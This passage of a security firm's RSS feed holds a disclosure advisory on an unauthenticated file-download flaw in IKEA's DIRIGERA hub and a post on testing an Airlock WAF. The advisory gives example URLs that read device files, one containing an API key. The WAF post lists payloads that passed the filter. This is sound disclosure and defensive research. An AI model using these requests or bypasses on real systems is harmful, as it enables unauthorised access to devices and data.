<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xsl" href="../../assets/xml/rss.xsl" media="all"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Pentagrid AG (Einträge über Web)</title><link>https://www.pentagrid.ch/</link><description></description><atom:link href="https://www.pentagrid.ch/de/categories/web.xml" rel="self" type="application/rss+xml"></atom:link><language>de</language><copyright>Contents © 2026 Pentagrid AG </copyright><lastBuildDate>Wed, 17 Jun 2026 19:14:52 GMT</lastBuildDate><generator>Nikola (getnikola.com)</generator><docs>http://blogs.law.harvard.edu/tech/rss</docs><item><title>Security misconfiguration in IKEA DIRIGERA smart hub web server exposes large parts of the root filesystem (GCVE-2342-2026-1)</title><link>https://www.pentagrid.ch/de/blog/ikea-dirigera-security-misconfiguration-web-server-exposes-root-filesystem/</link><dc:creator>Pentagrid AG</dc:creator><description>&lt;figure&gt;&lt;img src="https://www.pentagrid.ch/images/default_preview_image.jpeg"&gt;&lt;/figure&gt; &lt;p&gt;IKEA produces smart home devices and their newest generation uses the central &lt;a class="reference external" href="https://www.ikea.com/us/en/p/dirigera-hub-for-smart-products-white-smart-50503414/"&gt;DIRIGERA smart hub&lt;/a&gt;. After extracting the firmware, we started hunting for vulnerabilities of the device and found: An unauthenticated attacker on the network can download large parts of the files from the DIRIGERA hub root filesystem. This affects files that are accessible to the service user &lt;cite&gt;license-server&lt;/cite&gt;. These include binaries, firmware files, API keys and in general a lot of proprietary code written by Inter IKEA Systems.&lt;/p&gt;
&lt;!-- TEASER_END --&gt;
&lt;section id="timeline"&gt;
&lt;h2&gt;Timeline&lt;/h2&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;2026-03-18: Vulnerability was discovered.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2026-03-19: Tried to identify security contacts by checking IKEAS's security.txt, their GPG key and the web. The available online form for submissions was incompatible with Pentagrid's disclosure policy. Tried to contact &lt;a class="reference external" href="mailto:security@ikea.com"&gt;security@ikea.com&lt;/a&gt; by guessing the address, but the e-mail was bounced. Tried to reach out to IKEA via Linkedin and got afterwards contacted by Inter IKEA Systems.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2026-03-23: IKEA confirms they are handling the security reports. Pentagrid sends a draft of this advisory.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2026-03-26: Pentagrid contacts IKEA for a status update. IKEA confirms they are still triaging the issue.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2026-04-29: Pentagrid contacts IKEA for a status update.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2026-05-04: IKEA sends an update: The issue was a duplicate and reported shortly before Pentagrid's submission on Hackerone. A fix was released to production in the 2.934.1 release, which was released on 2026-04-09. The fix removes the license-server component from the build and that functionality has been reworked to be handled elsewhere outside of the hub. Pentagrid asks if disclosure could happen already. IKEA responds with with a list of questions regarding the disclosure.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2026-05-06: Pentagrid responds to the list of questions and provides an early draft of this blog post.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2026-05-13: Pentagrid asked for an update.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2026-05-27: IKEA agrees that the provided answers/blog post draft are in order with them and Pentagrid can proceed as planned.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2026-06-17: 90 days disclosure deadline and publication.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="unauthenticated-file-download-via-licensing-server"&gt;
&lt;h2&gt;Unauthenticated file download via licensing server&lt;/h2&gt;
&lt;pre class="literal-block"&gt;CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N, 5.8 Medium&lt;/pre&gt;
&lt;section id="affected-components"&gt;
&lt;h3&gt;Affected Components&lt;/h3&gt;
&lt;p&gt;The affected component is the IKEA DIRIGERA smart home hub created by Inter IKEA Systems. The device runs a busybox httpd web server on TCP port 8082, which runs as a systemd service under user &lt;cite&gt;license-server&lt;/cite&gt;.&lt;/p&gt;
&lt;p&gt;An initial firmware dump prior to the update showed the version information below. The system remained vulnerable after an update to a new firmware on 2026-03-18.&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_328e9d5973244adcb2132cd4d75100ae-1" name="rest_code_328e9d5973244adcb2132cd4d75100ae-1" href="https://www.pentagrid.ch/de/blog/ikea-dirigera-security-misconfiguration-web-server-exposes-root-filesystem/#rest_code_328e9d5973244adcb2132cd4d75100ae-1"&gt;&lt;/a&gt;[HomeSmart/Bootchain : 2.556]
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;and&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_284163d51fd54307bb5aa80e21b389f7-1" name="rest_code_284163d51fd54307bb5aa80e21b389f7-1" href="https://www.pentagrid.ch/de/blog/ikea-dirigera-security-misconfiguration-web-server-exposes-root-filesystem/#rest_code_284163d51fd54307bb5aa80e21b389f7-1"&gt;&lt;/a&gt;/etc/version
&lt;a id="rest_code_284163d51fd54307bb5aa80e21b389f7-2" name="rest_code_284163d51fd54307bb5aa80e21b389f7-2" href="https://www.pentagrid.ch/de/blog/ikea-dirigera-security-misconfiguration-web-server-exposes-root-filesystem/#rest_code_284163d51fd54307bb5aa80e21b389f7-2"&gt;&lt;/a&gt;20180309123456
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The vulnerability was fixed in version 2.934.1.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="summary"&gt;
&lt;h3&gt;Summary&lt;/h3&gt;
&lt;p&gt;An unauthenticated attacker on the network can download many files from the DIRIGERA hub root filesystem. The files must be accessible to the Linux user &lt;cite&gt;license-server&lt;/cite&gt;. These include binaries, firmware files, API keys as well as proprietary code written by Inter IKEA Systems.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="impact"&gt;
&lt;h3&gt;Impact&lt;/h3&gt;
&lt;p&gt;During the analysis Pentagrid was able to download 9639 files from 3149 folders from the embedded device's filesystem over the network without any authentication. These files include:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;&lt;cite&gt;/usr/share/config/platform/data/settings.json&lt;/cite&gt; which includes the API key that is the same for two analysed DIRIGERA hubs.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;cite&gt;/boot/m4-firmware&lt;/cite&gt; which is assumed to be the Cortex M4 firmware.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Most binaries files -- here it becomes apparent that busybox is used since most of &lt;cite&gt;/bin/*&lt;/cite&gt; binaries return the same (busybox) file.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Configurations of services such as the vulnerable &lt;cite&gt;/lib/systemd/system/license-server.service&lt;/cite&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Intellectual property of Inter IKEA Systems B.V., e.g. shell code of &lt;cite&gt;/usr/sbin/boot-complete.sh&lt;/cite&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Operational parameters that are stored in &lt;cite&gt;/usr/share/{factory, config, persist}&lt;/cite&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The usage of systemd service hardening, the usage of the &lt;a class="reference external" href="https://www.st.com/en/secure-mcus/authentication.html"&gt;STSAFE&lt;/a&gt; enviroment, and proper Linux user permissions limits the impact. To the best of our knowledge no client specific cryptographic material is exposed to the network. What is assumed to be the client certificate under &lt;cite&gt;/usr/local/gw/datad/certs/cert_datacloud.crt&lt;/cite&gt; is not accessible and would further require the protected STSAFE secret for the also inaccessible &lt;cite&gt;/usr/local/gw/datad/certs/key_datacloud.key&lt;/cite&gt;.&lt;/p&gt;
&lt;p&gt;The extracted files expose configurations, intellectual property, proprietary software, and firmware of the Ikea DIRIGERA hub, such as the vulnerabilities of the license server that is exploited here. The impact of exposed software versions is considered insignificant since the license server gives a comprehensive overview about the used software and versions regardless.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="technical-details"&gt;
&lt;h3&gt;Technical Details&lt;/h3&gt;
&lt;p&gt;The vulnerability originates from the misconfigured systemd service: &lt;cite&gt;/lib/systemd/system/license-server.service&lt;/cite&gt;. It serves a httpd server on port 8082 with a configuration file under &lt;cite&gt;/usr/share/common-licenses/httpd.conf&lt;/cite&gt;.&lt;/p&gt;
&lt;p&gt;Excerpt from file &lt;cite&gt;license-server.service&lt;/cite&gt;:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_130e12ea9c824096aa3423f398bab2a9-1" name="rest_code_130e12ea9c824096aa3423f398bab2a9-1" href="https://www.pentagrid.ch/de/blog/ikea-dirigera-security-misconfiguration-web-server-exposes-root-filesystem/#rest_code_130e12ea9c824096aa3423f398bab2a9-1"&gt;&lt;/a&gt;ExecStart=httpd -f -p 8082 -c /usr/share/common-licenses/httpd.conf
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Excerpt from file &lt;cite&gt;httpd.conf&lt;/cite&gt;:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_2e944694fde64cecb1940087acf7e71a-1" name="rest_code_2e944694fde64cecb1940087acf7e71a-1" href="https://www.pentagrid.ch/de/blog/ikea-dirigera-security-misconfiguration-web-server-exposes-root-filesystem/#rest_code_2e944694fde64cecb1940087acf7e71a-1"&gt;&lt;/a&gt;I:/usr/share/common-licenses/license_summary.txt
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;cite&gt;/usr/share/common-licenses/license_summary.txt&lt;/cite&gt; includes all the licensing information of the software running on the DIRIGERA hub. This file is the only content that is intended to be accessible via the web endpoint.&lt;/p&gt;
&lt;p&gt;Yet, if an unauthroized user visits the endpoint and appends any file system path to the base URL, the webserver returns the file contents or starts a file download, e.g.:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;&lt;a class="reference external" href="http://dirigera.example.local:8082/usr/share/config/platform/data/settings.json"&gt;http://dirigera.example.local:8082/usr/share/config/platform/data/settings.json&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a class="reference external" href="http://dirigera.example.local:8082/opt/nexus/bin/chipd"&gt;http://dirigera.example.local:8082/opt/nexus/bin/chipd&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a class="reference external" href="http://dirigera.example.local:8082/usr/lib/libicudata.so.71.1"&gt;http://dirigera.example.local:8082/usr/lib/libicudata.so.71.1&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a class="reference external" href="http://dirigera.example.local:8082/bin/ls"&gt;http://dirigera.example.local:8082/bin/ls&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a class="reference external" href="http://dirigera.example.local:8082/boot/m4-firmware"&gt;http://dirigera.example.local:8082/boot/m4-firmware&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;cite&gt;dirigera.example.local&lt;/cite&gt; is here the hostname of the DIRIGERA hub.&lt;/p&gt;
&lt;p&gt;The webserver serves these additional files due to a non-specified home directory in a busybox httpd service. The &lt;cite&gt;httpd&lt;/cite&gt; call inside the systemd service does not specify the &lt;cite&gt;-h&lt;/cite&gt; parameter (home/server root directory). Further, the configuration file &lt;cite&gt;/usr/share/common-licenses/httpd.conf&lt;/cite&gt; only specifies the index file via tag &lt;cite&gt;I:&lt;/cite&gt; but also does not specifiy the home directory using the tag &lt;cite&gt;H:&lt;/cite&gt; (called server root in the &lt;a class="reference external" href="https://github.com/mirror/busybox/blob/371fe9f71d445d18be28c82a2a6d82115c8af19d/networking/httpd.c#L41"&gt;configuration file&lt;/a&gt;). As a result, the webserver defaults to the current directory as the root directory of the webserver which is also the root directory of the entire file system (&lt;cite&gt;/&lt;/cite&gt;).&lt;/p&gt;
&lt;p&gt;All accessible files return status code 200. To identify existing folders they must be called without the tailing &lt;cite&gt;/&lt;/cite&gt;, e.g. send GET request to &lt;a class="reference external" href="http://dirigera.example.local:8082/usr/share/persist/tee"&gt;http://dirigera.example.local:8082/usr/share/persist/tee&lt;/a&gt; to get status code "302 Found" and a location reference to &lt;cite&gt;/usr/share/persist/tee/&lt;/cite&gt;. Directly requesting &lt;cite&gt;/usr/share/persist/tee/&lt;/cite&gt; results in status code "404 Not Found", which does not provide information to discriminate folder existence. Note, that besides the information gained from the files, attackers can gain additional information about the file system's structure by checking if a folder exists and is accessible: e.g. &lt;cite&gt;/usr/share/persist/tee/&lt;/cite&gt; is known to exist even though all files inside the folder are inaccessible.&lt;/p&gt;
&lt;p&gt;To scrape all 12788 files and directories, Pentagrid used a preconfigured wordlist based on the extracted firmware from another DIRIGERA hub. The total number of accessible entities is a lower (but confirmed) limit since crawling the licence endpoint/filesystem was done based on a non-comprehensive wordlist. The crawling wordlist included only known paths from partitions 9, 10, 11, 13, 14, 15, 16, 17, 18, and 20 of the emmc flash with partitions 15, 16/17, and 18/19 mounted under &lt;cite&gt;/usr/share/{factory, config, persist}&lt;/cite&gt;.&lt;/p&gt;
&lt;p&gt;The system tries to limit access with systemd service hardening, especially the &lt;cite&gt;InaccessiblePaths&lt;/cite&gt; setting in combination with the Linux user permissions — although this is not sufficient, it prevents further exploitation.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="precondition"&gt;
&lt;h3&gt;Precondition&lt;/h3&gt;
&lt;p&gt;An attacker needs access to TCP port 8082 of the IKEA DIRIGERA smart hub. Prior knowledge of the filesystem structure is not necessary but can reduce the time required to scrape the entire contents of the filesystem. A version before the 2.934.1 release has to be installed.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="recommendation"&gt;
&lt;h3&gt;Recommendation&lt;/h3&gt;
&lt;p&gt;Install firmware version 2.934.1 released on 2026-04-09 or a later one. The fix removes the license-server component from the build and the functionality has been reworked to be handled elsewhere outside of the hub.&lt;/p&gt;
&lt;p&gt;If you are using busybox httpd in a similar scenario, it is recommended to:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;provide a "Home directory" to httpd by via command line or configuration file.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;establish an allowlist to only expose the intended files. Beware, that busybox httpd config files are far more limited in their capabilities to restrict file access compared to their non-busybox alternative.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;apply additional systemd service hardening.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;not solely rely on systemd service denylisting with &lt;cite&gt;InaccessiblePaths&lt;/cite&gt; to administer the served content as denylisting is bad practise for access control.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="credits"&gt;
&lt;h3&gt;Credits&lt;/h3&gt;
&lt;p&gt;This vulnerability was discovered by Yannic 'toxsos' Hemmer (Pentagrid).&lt;/p&gt;
&lt;/section&gt;
&lt;/section&gt;</description><guid>https://www.pentagrid.ch/de/blog/ikea-dirigera-security-misconfiguration-web-server-exposes-root-filesystem/</guid><pubDate>Wed, 17 Jun 2026 13:42:00 GMT</pubDate></item><item><title>An excursion into Airlock WAF ruleset testing</title><link>https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/</link><dc:creator>Pentagrid AG</dc:creator><description>&lt;figure&gt;&lt;img src="https://www.pentagrid.ch/images/default_preview_image.jpeg"&gt;&lt;/figure&gt; &lt;p&gt;Recently we've been tasked to do an analysis of a web application firewall (WAF) of the vendor Ergon, namely the &lt;a class="reference external" href="https://www.airlock.com/"&gt;Airlock WAF&lt;/a&gt; regarding the effectivness of filtering. One idea was to see what happens when OWASP Core Rule Set (CRS) tests are run against it. This is the story of how we approached this, which payloads went through and how impossible it is to tell if that's good or bad now.&lt;/p&gt;
&lt;!-- TEASER_END --&gt;
&lt;p&gt;WAFs are a controversial topic. The reason is simply that there is no technical proof that either is universally helpful or harmful, as their effectiveness largely depends on a lot of things. We don't think you need a WAF in general, and we also don't think you need to get rid of your WAF if you have a use case. For all of you who are expecting us to provide the ultimate answer &lt;a class="brackets" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#footnote-1" id="footnote-reference-1" role="doc-noteref"&gt;&lt;span class="fn-bracket"&gt;[&lt;/span&gt;1&lt;span class="fn-bracket"&gt;]&lt;/span&gt;&lt;/a&gt; in this blog post: You can stop reading here. For everyone interested in learning some technical details about two WAF-related projects from real-world installations, please enjoy.&lt;/p&gt;
&lt;section id="about-wafs-and-airlock"&gt;
&lt;h2&gt;About WAFs and Airlock&lt;/h2&gt;
&lt;p&gt;Ergon's Airlock WAF is one of the better-known WAFs in Switzerland. One reason for this is that it is often recommended, bundled or sold with financial software, such as core banking systems. Some banks nevertheless use something else, while others stick with Airlock. Like any other WAF, Airlock mitigates risks according to their website.&lt;/p&gt;
&lt;p&gt;Like a standard firewall, a WAF has a set of rules that define wether something is blocked or allowed through. However, that's already where the similarity stops. Best practices for regular firewalls require you to create an allow-list of traffic you want to pass and deny everything else. By contrast, most WAFs use block-lists and allow everything else. Everybody in our industry knows block-lists are a recipe for security issues and that's why a WAF will never be perfect, but best effort. So as a matter of fact, WAF bypasses are a common thing.&lt;/p&gt;
&lt;p&gt;While every vendor and company using a WAF has their own rule set to fit their purpose, a key distinction exists: some who use a modified version of the &lt;a class="reference external" href="https://owasp.org/www-project-modsecurity-core-rule-set/"&gt;OWASP ModSecurity Core Rule Set (CRS)&lt;/a&gt;, while others don't use CRS at all. According to the CRS project, a lot of big cloud vendors are using CRS in their WAF. However, Airlock is one of the vendors that doesn't use CRS.&lt;/p&gt;
&lt;p&gt;Additionally, most WAFs allow to decide dynamically whether to use more or less strict rules for a certain category of attacks. CRS uses the term &lt;a class="reference external" href="https://coreruleset.org/docs/concepts/paranoia_levels/"&gt;"Paranoia Level" (1 to 4)&lt;/a&gt;, whereas Airlock calls it &lt;a class="reference external" href="https://docs.airlock.com/gateway/8.0/#data/1583435052416.html"&gt;"Security Level" or "Blocking Level" (basic, standard and strict)&lt;/a&gt;. As some might already have noticed, we'll sometimes refer to CRS as a WAF in this post, implying a compatible WAF engine like ModSecurity is using CRS.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="approach"&gt;
&lt;h2&gt;Approach&lt;/h2&gt;
&lt;p&gt;We've been tasked with analyzing an Airlock WAF and while we looked at various things, as a novel approach, we also decided to try to run comparison tests for Airlock against some of the CRS rules. As there seemed no one who did this before and wrote about it on the Internet, we tried our luck.&lt;/p&gt;
&lt;p&gt;Although there is a &lt;a class="reference external" href="https://docs.airlock.com/gateway/8.0/#data/1589475703024.html"&gt;public list of rule names&lt;/a&gt;, you need access to an Airlock WAF in order to see the actual Airlock rules (the regexes). Whereas CRS is an open-source project and you have full access to review it. This is very helpful for a pentester who is up against a CRS-based WAF, as you can even &lt;a class="reference external" href="https://github.com/coreruleset/coreruleset/labels/%3Aheavy_minus_sign%3A%20False%20Negative%20-%20Evasion"&gt;look up all currently unfixed evasions on GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The Airlock WAF we were facing had the following rules and blocking levels set:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Standard: SQL Injection (SQLi) in Parameter Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: SOL Injection (SQLi) in Header Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: Cross-Site Scripting (XSS) in Parameter Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: Cross-Site Scripting (XSS) in Header Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: Cross-Site Scripting (XSS) in Path&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: Template and Expression Language Injection&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Strict: HTML Injection in Parameter Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Strict: HTML Injection in Header Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Strict: HTML Injection in Path&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: UNIX Command Injection in Parameter Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: UNIX Command Injection in Header Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: Windows Command Injection in Parameter Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: Windows Command injection in Header Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: LDAP Injection in Parameter Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: LDAP Injection in Header Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: PHP Injection in Parameter Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: PHP Injection in Header Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: Object Graph Navigation Library (OGNL) injection (Apache Struts)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: Insecure Direct Object Reference in Parameter Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: Insecure Direct Object Reference in Path&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: NoSOL Injection in Parameter Name&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: NoSOL Injection in Parameter Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: NoSQL Injection in Header Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Strict: Parameter Name Sanity&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: Parameter Value Sanity&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Strict: Header Name Sanity&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: Header Value Sanity&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Strict: Path Sanity&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Strict: Encoding and Conversion Exploits in Parameter Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Strict: Encoding and Conversion Exploits in Header Value&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Strict: HTTP Response Splitting&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Strict: HTTP Parameter Pollution&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard: Miscellanous Exploits&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Strict: Automated Scanning&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Note that none of the rules are on the level "basic", so either the "standard" setting is used or even the highest protection level "strict".&lt;/p&gt;
&lt;/section&gt;
&lt;section id="crs-regression-test-run-against-airlock"&gt;
&lt;h2&gt;CRS regression test run against Airlock&lt;/h2&gt;
&lt;p&gt;The most interesting part for us was that the CRS project provides a &lt;a class="reference external" href="https://github.com/coreruleset/coreruleset/tree/main/tests/regression"&gt;full regression test set&lt;/a&gt;, which contains tests that trigger a rule in different ways. With some modifications, such as changing the target host, we were able to run these tests against the Airlock WAF. Although this approach seemed straightforward, we underestimated the amount of manual work required to determine whether a failed test result for CRS was really "an issue" for the Airlock WAF. That's why we didn't completely review the entire regression corpus. However, we still learned a lot of interesting facts about both WAFs, as you'll see.&lt;/p&gt;
&lt;p&gt;In the end, the effectiveness of a WAF depends a lot on its configuration (there are many features we don't even mention here) and on the type of application it is protecting. So even before starting, we knew the results wouldn't show a generally applicable picture.&lt;/p&gt;
&lt;p&gt;After tweaking the configuration of &lt;a class="reference external" href="https://github.com/coreruleset/go-ftw/releases"&gt;go-ftw&lt;/a&gt; (a framework for testing WAFs), and trying to run it against Airlock, it became obvious that this was going to involve a lot of manual work to figure out which things were really a problem on the Airlock side. Some of the reasons are:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;As we had to overwrite the destination (IP address and TCP port) as well as the HTTP Host header of tests to route our request correctly to the Airlock WAF, we already destroyed some of the CRS regression tests that injected into the HTTP Host header.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;There is no throttle mechanism in go-ftw and Airlock was configured to block an IP for a certain time if a threshold of blocked requests per minute was detected. Therefore, we split the test into smaller batches and waited for a while between each batch. When just a few of the test requests were blocked, the batches went through nicely, but for tests that resulted in many blocked requests, we had to rerun them. Fortunately for us, in this particular configuration, it was easy to detect in the HTTP responses when the Airlock WAF blocked our IP address.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Airlock has an allow-list regex of all HTTP header names that are forwarded to applications. If you inject into any HTTP header that is not on the allow-list, the request will never be blocked. Some of the CRS tests injected into custom HTTP headers and therefore never triggered any rule.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Airlock also has an allow-list regex of HTTP cookie names where the same issue applies.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;While CRS checks for certain patterns generically in all parameters, Airlock seems to check for certain things only when these parameters are defined to have that kind of content. For example, XML External Entity (XXE) attacks are not blocked generically in a parameter in Airlock.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Some CRS tests check for false positives (meaning CRS should not block them), but we were not interested in those, as we wanted to see what we could potentially smuggle past the Airlock WAF that CRS blocks.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="crs-regression-test-run-results"&gt;
&lt;h2&gt;CRS regression test run results&lt;/h2&gt;
&lt;p&gt;Here's a list of CRS test results that were passed through and were not blocked by the Airlock WAF under test (mid 2024), but would be blocked at some of the paranoia levels of the CRS. As said earlier, this list is incomplete as we didn't look at all the results of the CRS regression tests manually. The titles are the category titles by CRS.&lt;/p&gt;
&lt;section id="request-913-scanner-detection"&gt;
&lt;h3&gt;REQUEST-913-SCANNER-DETECTION&lt;/h3&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_d7e367b989164c97976cfa426b84368e-1" name="rest_code_d7e367b989164c97976cfa426b84368e-1" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_d7e367b989164c97976cfa426b84368e-1"&gt;&lt;/a&gt;User-Agent: nuclei
&lt;a id="rest_code_d7e367b989164c97976cfa426b84368e-2" name="rest_code_d7e367b989164c97976cfa426b84368e-2" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_d7e367b989164c97976cfa426b84368e-2"&gt;&lt;/a&gt;User-Agent: urlgrabber/3.10 yum/3.4.3
&lt;a id="rest_code_d7e367b989164c97976cfa426b84368e-3" name="rest_code_d7e367b989164c97976cfa426b84368e-3" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_d7e367b989164c97976cfa426b84368e-3"&gt;&lt;/a&gt;User-Agent: Mozilla/5.0 zgrab/0.x
&lt;a id="rest_code_d7e367b989164c97976cfa426b84368e-4" name="rest_code_d7e367b989164c97976cfa426b84368e-4" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_d7e367b989164c97976cfa426b84368e-4"&gt;&lt;/a&gt;User-Agent: mozilla/5.0 ecairn-grabber/1.0 (+http://ecairn.com/grabber)
&lt;/pre&gt;&lt;/div&gt;
&lt;/section&gt;
&lt;section id="request-920-protocol-enforcement"&gt;
&lt;h3&gt;REQUEST-920-PROTOCOL-ENFORCEMENT&lt;/h3&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_17a75ecb6d5646c5a4f453cbb0fdcfc3-1" name="rest_code_17a75ecb6d5646c5a4f453cbb0fdcfc3-1" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_17a75ecb6d5646c5a4f453cbb0fdcfc3-1"&gt;&lt;/a&gt;GET /?param=%25%37%33%25%36%46%25%36%44%25%36%35%25%37%34%25%36%35%25%37%38%25%37%34%25%35%46%25%33%31%25%33%32%25%33%33%25%33%34 HTTP/1.1
&lt;/pre&gt;&lt;/div&gt;
&lt;/section&gt;
&lt;section id="request-921-protocol-attack"&gt;
&lt;h3&gt;REQUEST-921-PROTOCOL-ATTACK&lt;/h3&gt;
